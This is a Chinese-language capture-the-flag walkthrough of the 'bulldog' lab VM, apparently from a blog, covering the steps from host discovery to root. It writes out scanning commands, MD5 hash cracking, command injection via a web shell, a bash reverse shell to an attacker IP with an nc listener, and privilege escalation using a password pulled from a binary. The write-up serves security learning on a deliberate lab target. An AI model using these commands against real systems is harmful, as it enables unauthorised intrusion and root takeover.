bulldog渗透总结
运行环境:
测试机:kali
靶机:bulludog
主机发现
arp-scan -l
或者
netdiscover -i eth0 -r 192.168.223.0/24
或者
nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要扫)
扫描出来是192.168.223.233
端口扫描
masscan --rate=10000 -p0-65535 192.168.223.233
masscan扫描速度快,但准确度不高,可以多扫几次,以防漏扫
或者
nmap -sS 192.168.223.132
服务识别
nmap -sV 192.168.223.233 -p23,8080,80
发现漏洞并识别
1.浏览器访问 http://192.168.223.233
没有发现什么可用的
目录扫描
发现2个大的目录,一个是admin,一个是dev
来尝试访问一下 192.168.223.233/admin/login,尝试弱密码登录,失败
查看一下网页源码,没有什么发现
我们再来看下另一个目录 192.168.223.233/dev
可以知道,完全删除了php和可以使用ssh,从之前端口扫描,我们可以知道ssh端口是23
点击web-shell,看能不能获取shh
点进去之后获取ssh失败,说必须以服务器身份登录才行
我们在回到之前的 192.168.223.233/dev 来查看一下源码,可以看到注释有MD5(Django)的字符串,
挨着顺序解密,发现只有最后2个可以解密出来,bulldog bulldoglover
尝试用解密出来的值做密码,解密前面的邮箱作为账号登录,
失败
尝试用邮箱开头做账号,解密值做密码,成功登录,但是发现没有任何权限
用另一个也是一样,成功登录,但是发现没有任何权限
这时候再打开172.168.111.90/dev页面,发现刚才的web shell能用了
不过好像只能用系统给出的几个命令。先试一下有没有命令注
ifconfig&whoami
根据反馈结果判断存在命令注入,那接下来就好办了。
在攻击机kali中打开命令终端开始监听,输入nc -lvnp 6666
尝试bash反弹,在靶机打开的网页命令框中输入
echo “bash -i >& /dev/tcp/192.168.223.34/6666 0>&1″ | bash
使用echo命令反弹shell成功
首先查看有哪些系统用户,cat /etc/passwd。发现了一个重点对象:bulldogadmin
然后,查找他的文件 find / -user bulldogadmin 2>/dev/null
发现有hiddenadmindirectory隐藏目录,用less命令打开里面包含的文件看看,比如打开note看看
我也不知道是啥意思,那就百度翻译一下
我们再来看另一个,
发现是乱码,我们用 strings 来看一下这个文件
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
噗,看到一堆英文字符,但是依然可以很轻松的看出文件中间有一个被 H 大段的PASSWORD的单词。于是把前后段去掉H ,得到SUPERultimatePASSWORDyouCANTget 把她保存着,可能需要这个密码
su命令执行一下,提示需要一个终端,
网查了一下资料,可以用python调用本地的shell,命令:
python -c ‘import pty;pty.spawn("/bin/bash")’
然后执行命令 sudo su – ,输入刚才记下来的的密码试一下,结果成功获得root权限,拿到flag
输入ls命令,发现里面只有一个文本文档
输入 cat congrats.txt 打开看下
这里要解释一下,我这里的双写
比如这个 其实就是sudo su -
总结:
主机发现
端口扫描
服务发现
然后查看web服务
爆破出目录admin和dev页面
利用解密MD5得到的密码登录系统,然后绕过系统权限
命令执行
反弹shell
提权
bulldog渗透总结相关推荐
- 2.Bulldog渗透实战
攻击机:Kali 攻击机ip:192.168.56.102 主机发现 端口扫描 版本侦测 访问80,8080端口是一样的网站 在http://192.168.56.101:8080界面没有发现有价值的 ...
- 【渗透测试】靶机渗透Vulnhub-bulldog
目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...
- 靶机渗透【bulldog】
文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...
- Bulldog靶机渗透
Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...
- 靶机渗透测试实战(三)——Bulldog1渗透实战
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集--主机发现 (2)信息收集--端口扫描 (3)信息收集--操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:I ...
- 渗透测试实战3——bulldog2靶机入侵
一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...
- VulnHub渗透测试实战靶场笔记(持续更新)
靶机(一)----Breach1.0 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网 ...
最新文章
- 047_BOM_DOM
- 第 2 章:初出茅庐【初级篇 - 2.2 贪心算法】
- Python基础1 历史 变量
- 区块链 PoS 共识——Tendermint
- 电脑操作系统维护10条实用建议!
- java xml解析_Java解析XML(4种方法)
- php yaf.dll,windows下配置nginx+php+yaf的环境
- 龙芯笔记本可能以闹剧收场
- Vue 动画 过渡的类名
- “吃神么,买神么”的第一个Sprint计划(第三天)
- PHP exit()与die()的区别
- 软件开发管理与质量控制
- “应用程序无法正常启动 0xc0150002”如何解决?
- HTML5实例教程:拼图游戏-何韬-专题视频课程
- 关于王者荣耀技术背景的文章
- 我们都需要刷新——读现任微软CEO萨提亚的《刷新》有感
- 用python实现颜值打分,还能测测自己的颜值
- error C2041: illegal digit ‘9‘ for base ‘8‘ | error C2059: syntax error: ‘bad suffix on number‘
- 如何优雅的写一篇安利文-以Sugar ORM为例
- 重磅!地球科学类最新SCI期刊影响因子2020
热门文章
- FS4059B是5V输入升压充电8.4V1.5A的升压恒流充电IC高效串联充电
- 多个计算机组成一个,怎么将两台计算机组成一个集群?
- GNS3 v0.8.6简体中文官方版本下载
- CSS3字体样式及高级特效
- 在计算机英语中input的意思,input是什么意思
- 新手购买服务器搭建属于自己的网站(详细版)
- excel排名_表格技巧—如何在Excel中快速计算排名
- Windows 平台下局域网劫持测试工具 – EvilFoca
- life: zz 关于爱情
- 掌握“盘带技术”——比较磁盘存储和磁带存储